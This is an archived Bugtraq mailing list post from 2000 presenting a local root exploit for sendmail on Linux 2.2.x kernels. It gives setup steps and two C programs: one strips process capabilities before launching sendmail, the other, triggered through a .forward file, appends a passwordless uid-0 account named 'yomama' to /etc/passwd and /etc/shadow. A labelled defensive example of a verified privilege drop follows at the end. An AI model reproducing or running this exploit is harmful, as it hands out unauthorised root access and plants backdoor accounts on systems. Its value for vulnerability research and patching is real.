Bugtraq mailing list archives
Sendmail local root exploit on linux 2.2.x
From: sky () REAL-LINUX DE (Florian Heinz)
Date: Thu, 8 Jun 2000 14:21:48 +0200
Hello all,

Attached is a file with 2 sources, ex.c and add.c
compile these 2 and create a file "mail":

From: yomama () foobar com
To: localuser () localdomain com
Subject: foo
bar
.

then create a .forward with:
|/path/to/add

then just do: ./ex < mail

this should add a user yomama with uid/gid = 0 and without a password set
a simple su - yomama should give you root.

This exploit was written by me in a hurry, I hope there are no mistakes

Greets

Florian Heinz

-- snip -- ex.c --
#include <linux/capability.h>

int main (void) {
   cap_user_header_t header;
   cap_user_data_t data;

   header = malloc(8);
   data = malloc(12);

   header->pid = 0;
   header->version = _LINUX_CAPABILITY_VERSION;

   data->inheritable = data->effective = data->permitted = 0;
   capset(header, data);

   execlp("/usr/sbin/sendmail", "sendmail", "-t", NULL);
}
-- snap -- ex.c --

-- snip -- add.c --
#include <fcntl.h>

int main (void) {
   int fd;
   char string[40];

   seteuid(0);
   fd = open("/etc/passwd", O_APPEND|O_WRONLY);
   strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
   write(fd, string, strlen(string));
   close(fd);
   fd = open("/etc/shadow", O_APPEND|O_WRONLY);
   strcpy(string, "yomama::11029:0:99999:7:::");
   write(fd, string, strlen(string));
   close(fd);
}
-- snap -- add.c --
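A defender's view of what add.c depends on, as an added example (not code from the original post and not sendmail's own code): add.c calls seteuid(0) before appending to /etc/passwd, so it only works if the process that runs the .forward program can still become root. A checked, verified privilege drop before running such a program looks like this; the helper name drop_privileges() and the fallback id 65534 are assumptions.

```c
#define _DEFAULT_SOURCE                 /* for setgroups() and seteuid() */
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 0 only if the process now runs as uid/gid and cannot get root back.
 * drop_privileges() is a hypothetical helper name, not a sendmail function. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0)
        return -1;                      /* "dropping" to root is not a drop */

    /* Only a privileged process may (and must) clear supplementary groups. */
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;

    /* Group first: after setuid() we may no longer be allowed to change it. */
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;                      /* never continue after a failed drop */

    /* Do not trust the return codes alone: read the credentials back. */
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid)
        return -1;

    /* What add.c does first: try to become root again. It must fail. */
    if (seteuid(0) == 0 || setuid(0) == 0)
        return -1;

    return 0;
}

int main(void)
{
    /* Constructed demo: as root, drop to 65534 (commonly "nobody"); otherwise
     * use the caller's own ids, which still exercises every check. */
    uid_t uid = getuid() ? getuid() : 65534;
    gid_t gid = getgid() ? getgid() : 65534;

    if (drop_privileges(uid, gid) != 0) {
        fprintf(stderr, "privilege drop failed, refusing to run program\n");
        return 1;
    }
    printf("uid=%d gid=%d, root not recoverable\n", (int)getuid(), (int)getgid());
    return 0;
}
```

A caller that gets -1 back must abort instead of executing the user-supplied program.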